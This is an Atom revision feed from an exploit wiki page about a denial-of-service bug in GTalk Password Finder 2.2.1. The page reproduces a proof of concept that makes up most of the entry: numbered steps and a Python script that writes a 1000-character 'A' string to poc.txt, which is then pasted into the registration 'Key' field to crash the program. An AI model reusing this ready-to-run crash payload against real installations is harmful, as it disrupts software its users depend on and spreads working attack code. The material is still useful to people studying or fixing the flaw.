<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=GTalk_Password_Finder_2.2.1_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>GTalk Password Finder 2.2.1 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=GTalk_Password_Finder_2.2.1_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=GTalk_Password_Finder_2.2.1_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T03:38:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=GTalk_Password_Finder_2.2.1_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=1285&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-16 # Vendor Homepage : htt...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=GTalk_Password_Finder_2.2.1_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=1285&amp;oldid=prev"/>
		<updated>2021-04-08T09:59:37Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: GTalk Password Finder 2.2.1 - &amp;#039;Key&amp;#039; Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-16 # Vendor Homepage : htt...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)&lt;br /&gt;
# Exploit Author: Ismail Tasdelen&lt;br /&gt;
# Exploit Date: 2020-01-16&lt;br /&gt;
# Vendor Homepage : http://www.nsauditor.com/&lt;br /&gt;
# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe&lt;br /&gt;
# Tested on OS: Windows 10&lt;br /&gt;
# CVE : N/A&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Proof of Concept (PoC):&lt;br /&gt;
=======================&lt;br /&gt;
&lt;br /&gt;
1.Download and install GTalk Password Finder&lt;br /&gt;
2.Run the python operating script that will create a file (poc.txt)&lt;br /&gt;
3.Run the software &amp;quot;Register -&amp;gt; Enter Registration Code&lt;br /&gt;
4.Copy and paste the characters in the file (poc.txt)&lt;br /&gt;
5.Paste the characters in the field 'Key' and click on 'Ok'&lt;br /&gt;
6.GTalk Password Finder Crashed&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
    &lt;br /&gt;
buffer = &amp;quot;A&amp;quot; * 1000&lt;br /&gt;
 &lt;br /&gt;
payload = buffer&lt;br /&gt;
try:&lt;br /&gt;
    f=open(&amp;quot;poc.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
    print(&amp;quot;[+] Creating %s bytes evil payload.&amp;quot; %len(payload))&lt;br /&gt;
    f.write(payload)&lt;br /&gt;
    f.close()&lt;br /&gt;
    print(&amp;quot;[+] File created!&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
    print(&amp;quot;File cannot be created.&amp;quot;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>